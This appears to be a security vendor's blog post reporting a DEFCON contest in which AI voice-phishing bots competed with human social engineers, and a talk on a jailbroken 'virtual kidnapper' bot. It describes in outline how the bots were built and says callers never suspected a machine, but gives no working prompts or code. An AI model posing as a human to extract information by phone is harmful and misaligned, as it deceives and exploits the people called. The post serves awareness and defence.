[PROVED] Unsuspecting Call Recipients Are Super Vulnerable to AI Vishing



john-henry-competitionHeads-up: I just proved that unsuspecting call recipients are super vulnerable to AI vishing

So, this is pretty exciting… and terrifying. If you attended my “Reality Hijacked” webinar back in May, you saw me do a quick demonstration of a couple AI-powered vishing bots that I’d been working on.

That experiment got its first real “live fire” test this past Saturday at the DEFCON Social Engineering Village capture the flag (CTF) competition. Well, actually, they created an inaugural event titled the “John Henry Competition” just for this experiment. The goal was to put the AI to the test. To answer the question: can an AI-powered voice phishing bot really perform at the level of an experienced social engineer?

The answer: DEFINITELY.

The AI's performance in its debut was impressive. The bots engaged in banter, made jokes, and were able to improvise to keep their targets engaged. By the end of our allotted 22 minutes, the AI-driven system captured 17 objectives while the human team gathered 12 during their 22-minute allotment.

But here’s where it gets interesting. Everyone in the room naturally assumed the bots had won – even the other contestants. The bots were picking-up flags so fast and obviously got more. But even though our AI bots managed to gather more flags, the human team won – by a hair (1,500 pts vs. 1450 pts). This was one of those contest results that shocked everyone.

What clenched it for the human team was an amazing pretext that allowed them to secure higher point-value flags at the very beginning of the call vs building up to those higher value objectives.

But now think about it. The difference wasn’t that the targets trusted the humans more. It wasn’t that they somehow suspected that the AI was an AI. It came down to strategy and pretext… something that can be incorporated into the LLM’s prompt. And that’s where things get real.

Here are a few points of interest:

  • The backend of what we used was all constructed using commercially available, off-the-shelf SaaS products, each ranging from $0 to $20 per month. This reality ushers in a new era where weapons-grade deception capabilities are within reach of virtually anyone with an internet connection.
  • The LLM prompting method we employed for the vishing bots didn't require any 'jailbreaking' or complex manipulation. It was remarkably straightforward. In fact, I explicitly told it in the prompt that it was competing in the DEFCON 32 Social Engineering Village vishing competition.
  • The prompt engineering used was not all that complex. Each prompt used was about 1,500 words and was written in a very straightforward manner.
  • Each of the components being used was functioning within what would be considered allowable and ‘safe’ parameters. It is the way they can be integrated together – each without the other knowing – that makes it weaponizable.
  • None of the targets who received calls from the bots acted with any hesitancy. They treated the voice on the other end of the phone as if it were any other human caller.

We’re facing a raw truth

AI-driven deception can operate at an unprecedented scale, potentially engaging thousands of targets simultaneously. These digital deceivers never fatigue, never nervously stumble, and can work around the clock without breaks. The consistency and scalability of this technology present a paradigm shift in the realm of social engineering.

Perhaps most unsettling was the AI's ability to pass as human. The individuals on the receiving end of these calls had no inkling they were interacting with a machine. Our digital creation passed the Turing test in a real-world, high-stakes environment, blurring the line between human and AI interaction to an unprecedented degree.

My Conversations with a GenAI-Powered Virtual Kidnapper

The following day, I gave a talk at the AI Village titled "My Conversations with a GenAI-Powered Virtual Kidnapper." The session was standing room only, with attendees spilling over into the next village, underscoring the intense interest in this topic.

During this talk, I demonstrated a much darker, fully jailbroken bot capable of simulating a virtual kidnapping scenario (this is also previewed in my “Reality Hijacked” webinar). I also discussed some of the interesting quirks and ways that I interacted with the bot while testing its boundaries. The implications of this more sinister application of AI technology are profound and warrant their own discussion in a future post.

Since the demonstration and talk, I've been encouraged by the number of companies and vendors reaching out to learn more about the methods and vulnerabilities that enabled the scenarios I showcased. These conversations promise to be fruitful as we collectively work to understand and mitigate the risks posed by AI-driven deception.

This competition serves as a wake-up call

So, here’s where we are: This competition and the subsequent demonstrations serve as a wake-up call. We're not just theorizing about potential future threats; we're actively witnessing the dawn of a new era in digital deception. The question now isn't if AI can convincingly impersonate humans, but how we as a society will adapt to this new reality.

If you’re interested in topics like these and want to know what you can do to protect yourself, your organization, and your family, then consider checking-out my new book, "FAIK: A Practical Guide to Living in a World of Deepfakes, Disinformation, and AI-Generated Deceptions." The book offers strategies for identifying AI trickery and maintaining personal autonomy in an increasingly AI-driven world. It's designed to equip readers with the knowledge and tools necessary to navigate this new digital landscape. (Available on October 1st, with pre-orders open now).


Free BreachSim Tool

How easy is it for bad actors to penetrate your system and exfiltrate your data? Pinpoint vulnerabilities, take action and build stronger cyber defenses with KnowBe4’s Breach Simulator “BreachSim.” Based on techniques outlined in the MITRE Att&CK framework, BreachSim launches 12+ simulated scenarios to uncover the stark reality of what happens when employees unknowingly fall for an attack.

BreachSim LogoHow BreachSim works:

  • 100% harmless simulation of real breach and data exfiltration attacks
  • Provides secure .txt, .doc, and .bmp test files for the simulation
  • Tests 12+ realistic data exfiltration scenarios following the MITRE Att&CK framework
  • Just download the installer, upload the secure test files, and run

Results in a few minutes!

Try Now

PS: Don't like to click on redirected buttons? Cut & Paste this link in your browser:

https://www.knowbe4.com/free-tools/breach-simulator



Subscribe to Our Blog


Comprehensive Anti-Phishing Guide




Get the latest about social engineering

Subscribe to CyberheistNews